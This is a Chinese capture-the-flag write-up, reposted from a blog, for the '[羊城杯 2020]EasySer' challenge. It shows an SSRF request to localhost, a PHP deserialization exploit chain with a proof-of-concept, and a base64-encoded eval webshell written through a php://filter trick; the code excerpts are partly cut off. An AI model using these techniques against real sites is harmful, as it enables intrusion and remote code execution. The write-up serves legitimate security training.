目录 信息搜集 代码审计 参数扫描 信息搜集 先扫下目录 .htaccess;robots.txt;flag.PHP;index.php 在robots.txt下看到了/star1.php 进入star1.php发现出现ser
目录
先扫下目录
在robots.txt下看到了/star1.php
进入star1.php发现出现ser.php
直接进入ser.php发现进不去,看来需要用上面提到的不安全协议,从他家,我们看到提示给的是百度的地址,考虑访问内网地址127.0.0.1,横向穿透.利用 SSRF 才能访问到 ser.php
?path=Http://127.0.0.1/ser.php
拿到ser.php源码
hero = new Yasuo; } public function __toString(){ if (isset($this->hero)){ return $this->hero->hasaki(); }else{ return "You don't look very happy"; } }}class Yongen{ //flag.php public $file; public $text; public function __construct($file='',$text='') { $this -> file = $file; $this -> text = $text; } public function hasaki(){ $d = ''; $a= $d. $this->text; @file_put_contents($this-> file,$a); }}class Yasuo{ public function hasaki(){ return "I'm the best happy windy man"; }}?>
创建一个GWHT对象,hero为yongen对象,然后向file写入一句话木马
,先去除标签再base64解码的方法。poc
hero = new Yongen();$door->hero->file = 'php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php';$door->hero->text = 'PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==';echo urlencode(serialize($door));?>
用蚁剑连接shel.php,flag 在根目录下
arjun扫描传入的参数为c和path
来源地址:https://blog.csdn.net/qq_63701832/article/details/128766325
--结束END--
本文标题: [羊城杯 2020]EasySer
本文链接: https://lsjlt.com/news/386015.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
0